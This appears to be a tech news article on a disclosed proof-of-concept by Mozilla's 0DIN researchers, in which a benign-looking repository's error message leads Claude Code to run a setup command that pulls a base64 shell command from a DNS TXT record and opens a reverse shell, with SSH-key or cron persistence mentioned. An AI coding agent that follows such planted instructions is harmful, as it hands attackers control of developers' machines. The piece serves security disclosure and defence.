Mozilla's 0DIN security research lab showed a clean GitHub repo and a routine DNS lookup can turn Claude Code's helpfulness into a remote access backdoor on a developer's machine.
The exploit doesn't live in the code. It lives in the agent's willingness to run a command a developer clearly meant to run themselves.
Mozilla's 0DIN researchers Andre Hall and Miller Engelbrecht disclosed a proof-of-concept this week showing how Anthropic's Claude Code can be talked into opening a reverse shell on a developer's machine, with no malicious payload present in the cloned repository. The instruction arrives later, fetched from a DNS TXT record no static scanner inspects, and is delivered to the agent as if it were the user's own recovery command.
The DNS TXT record carries a base64-encoded shell command that only resolves when the agent runs its startup check. Static code review, software composition analysis, dependency scanners, and antivirus tools all see a clean repository containing a benign Markdown README and a fake monitoring tool called "Axiom." The dangerous instruction only resolves at runtime, decoding into a reverse shell. As BleepingComputer reports, every individual step looks unremarkable on its own.
The attack begins with a developer cloning a repository that looks like any other monitoring project. The README explains how to install "Axiom," and the developer runs the tool without initializing it. The tool returns an error message instructing the user to run a specific setup command to recover. That message reads like standard troubleshooting documentation.
Claude Code, asked to help, follows the written instruction automatically. The setup command triggers a hidden shell script that queries a DNS TXT record controlled by the attacker, decodes the base64 response, and executes a reverse shell that connects back to the attacker's server. The TechRadar writeup notes that once inside, the attacker can plant an SSH key or schedule a hidden cron job for persistence. A single repository link shared in a job posting, chat message, or README could compromise every developer who clones it.
Conventional security assumes the threat lives in the artifact. Source code, dependencies, build scripts, and binary payloads can all be inspected before execution. The 0DIN PoC sidesteps that assumption by leaving nothing suspicious to inspect. As HelpNetSecurity reports, the malicious instruction is not part of the repository at all; it is delivered through a channel that network monitoring registered as ordinary domain name resolution.
This is the architectural failure the researchers are flagging. Tool-using agentic coders combine three properties: broad shell and filesystem access, a permissive execution stance toward commands that look routine, and an instruction-following mandate that treats anything resembling a developer request as legitimate. Helpfulness is the attack surface.
Constraining the agent's helpfulness undermines its value proposition. Leaving it permissive opens every instruction channel the agent reads at runtime — DNS, environment variables, log files, error messages, and external documentation — as a candidate injection surface. The core tension is that both directions destroy the developer experience that drives adoption.
DevOps.com reports that the disclosure is a warning about prompt-injection risk more broadly. The mechanism class is not specific to one tool's parser; it is a property of agents that read untrusted text and act on it with shell privileges. As Developer-Tech.com notes, the practical question is how coding-agent vendors will sandbox the execution layer without breaking the developer experience that drives adoption.
The 0DIN PoC targets Claude Code specifically, with its particular combination of permissive shell execution and runtime DNS resolution. Whether other coding agents, including Cursor, Codex, and Copilot's agent mode, share the same DNS-TXT indirect-injection surface is not verified in the current disclosure. The mechanism class generalizes, but the specific channel does not necessarily transfer. Developers running any tool-using agent against untrusted repositories should treat the entire developer workstation as compromised the moment an unfamiliar command executes, regardless of which agent performed the execution.
The broader pattern, as Vibegraveyard summarizes it, is that the agent's helpfulness and the attacker's instructions now share the same trust boundary. Until that boundary is redrawn, cloning an interesting-looking repository is no longer a code-review problem. It is a host-trust problem.